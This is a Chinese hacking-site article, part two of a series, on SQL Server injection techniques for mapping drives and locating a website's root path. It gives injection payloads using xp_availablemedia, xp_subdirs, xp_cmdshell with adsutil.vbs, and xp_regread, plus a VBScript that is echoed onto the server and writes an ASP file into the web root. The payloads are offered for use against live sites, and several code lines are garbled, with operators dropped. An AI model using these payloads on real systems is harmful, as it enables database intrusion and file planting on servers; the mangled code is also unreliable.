SQL数据库注入的四种个人经验和技巧方法(2)_SQL SERVER数据库_黑客防线网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN

SQL数据库 注入的四种个人经验和技巧方法(2)

作者:黑客防线网安SQL维护基地 来源:黑客防线网安SQL维护基地 浏览次数:0

本篇关键词:技巧方法经验个人
黑客防线网安网讯:     1)我们可以利用xp_availablemedia来获得当前所有驱动器,并存入dirs表中: 5 ;insert dirs exec master.dbo.xp_availablemedia;-- 我们可以通过查询temp的内容来获得驱动器列表及相关信...

     1)我们可以利用xp_availablemedia来获得当前所有驱动器,并存入dirs表中:

5 ;insert dirs exec master.dbo.xp_availablemedia;--

我们可以通过查询temp的内容来获得驱动器列表及相关信息

(2)我们可以利用xp_subdirs获得子目录列表,并存入dirs表中:

5 ;insert into dirs exec master.dbo.xp_subdirs ’c:\’ ;--

优缺点分析:

很明显了,这样就不会出现xp_dirtree那种所有目录都放在一起的情况了,只会显示一级目录,找起来方便多了.

缺点也很明显,只有sa有这个权限,也有可能管理员删除了这个扩展(毕竟太强大了).

方法三:

这种方法很好

下面这个是原文

想到了使用adsutil.vbs程序,我是这样执行的

a’;exec master..xp_cmdshell ’cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/1/root>a.txt’;--是不是很长啦通过它我们可以把iis里面第一个虚拟web站点的设置情况(当然包括它所在的实际目录咯)导入到a.txt中对于a.txt的实际位置默认当然是c:\winnt\system32,其实这都不是问题不过遇到管理员把adsutil.vbs,删了或是放到别的地方我们就没办法了(不可能自已用echo 命令写一个吧)

第二步:用echo命令写下面的代码到c:\中,很多吗也不算吧

.....xp_cmdshell ’echo set fso1=createobject("scripting.filesystemobject")>c:\read.vbs’;--

.....xp_cmdshell ’echo Set WshShell = Wscript.createObject("Wscript.Shell")>>c:\read.vbs’

;--

.....

-------------------read.vbs---------------------------------

set fso1=createobject("scripting.filesystemobject")

Set WshShell = Wscript.createObject("Wscript.Shell")

spa=WshShell.Environment("process")("windir")

set fil =fso1.opentextfile(spa & "\system32\aa.txt")

do while not fil.atendofstream

nr=fil.readline

if left(nr,4)="Path" then

pa=mid(nr,instr(nr,")") 3,len(nr)-instr(nr,")")-3)

exit do

end if

loop

set fil1 =fso1.opentextfile(pa &"\dd.asp",2,true)

fil1.writeline ""

---------------cut here-------------------------------------

第三步:当然就是执行read.vbs三,这样我们可以把aa.txt中的内容读出来找到web站点的实际路径

然后写一个叫dd.asp的文件在web站的根目录中,能否成功试试就知道咯

执行http://x.x.x.x/dd.asp

返回:\xxx

哈哈,的确是好方法,

不过原文好像有点问题

就是

set fil =fso1.opentextfile(spa %2B "\system32\aa.txt")

set fil1 =fso1.opentextfile(pa%2B"\dd.asp",2,true)

两句提交时会出错

于是我们想到了加号,和&的功能相同

还有就是写点什么东西到dd.asp呢?写入pa,哈哈

哈哈,改成了

-------------------read.vbs---------------------------------

set fso1=createobject("scripting.filesystemobject")

Set WshShell = Wscript.createObject("Wscript.Shell")

spa=WshShell.Environment("process")("windir")

set fil =fso1.opentextfile(spa "\system32\aa.txt")

do while not fil.atendofstream

nr=fil.readline

if left(nr,4)="Path" then

pa=mid(nr,instr(nr,")") 3,len(nr)-instr(nr,")")-3)

exit do

end if

loop

set fil1 =fso1.opentextfile(pa "\dd.asp",2,true)

fil1.writeline pa

---------------cut here--------------------------------------

因为用浏览器提交时 号被转换成了空格,所以在提交的时候还应该把变成%2B,好了,应该可以了,如下

-------------------read.vbs---------------------------------

set fso1=createobject("scripting.filesystemobject")

Set WshShell = Wscript.createObject("Wscript.Shell")

spa=WshShell.Environment("process")("windir")

set fil =fso1.opentextfile(spa %2B "\system32\aa.txt")

do while not fil.atendofstream

nr=fil.readline

if left(nr,4)="Path" then

pa=mid(nr,instr(nr,")") 3,len(nr)-instr(nr,")")-3)

exit do

end if

loop

set fil1 =fso1.opentextfile(pa %2B "\dd.asp",2,true)

fil1.writeline pa

---------------cut here--------------------------------------

如果发现1没有的话,我们可以该成2,3,4...........

a’;exec master..xp_cmdshell ’cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/2/root>a.txt’;--

但是这种方法只能在windows2000下使用,因为2003下新建的网站所在地址不是按照1234来排列的,好像是随机生成的,个人比较过几个2003下的

地址,没有发现什么规律.

优缺点分析

同上xp_cmdshell不是每一个用户都可以用的!还有一个问题是adsutil文件不一定存在,或者不一定在那个路径上,当然如果你原意的话你可以用

echo写一个(哈哈,老多老多行的哟),另外的一个问题是,如果主机上有很多站点怎么办?我遇到过一个有九个站点的主机,胆识只有第8个是有用

的,晕了吧,很难有人有嗯那个耐性会坚持到那么多的,早就崩溃了或许.还有就是不能在2003下用!

不过说实话,这个方法的确是一个好方法

方法四:

这个方法是要饭的提到的,通过xp_regread等从注册表里读出路径

以下推荐,获取网页路径(通过存储过程达到对注册表的读取):

利用内置存储过程 xp_regread(读取注册表键值,权限public):

语句:http://www.xxx.com/list.asp?classid=1;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test

varchar(20) exec master..xp_regread @rootkey= HKEY_LOCAL_MACHINE , @key=

SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\ , @value_name= / , values=@test OUTPUT insert into paths

(path) values(@test)
 

    黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-10768-1.html
网站维护教程更新时间:2012-03-21 03:10:09  【打印此页】  【关闭
我要申请本站N点 | 黑客防线官网 |  
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479

footer  footer  footer  footer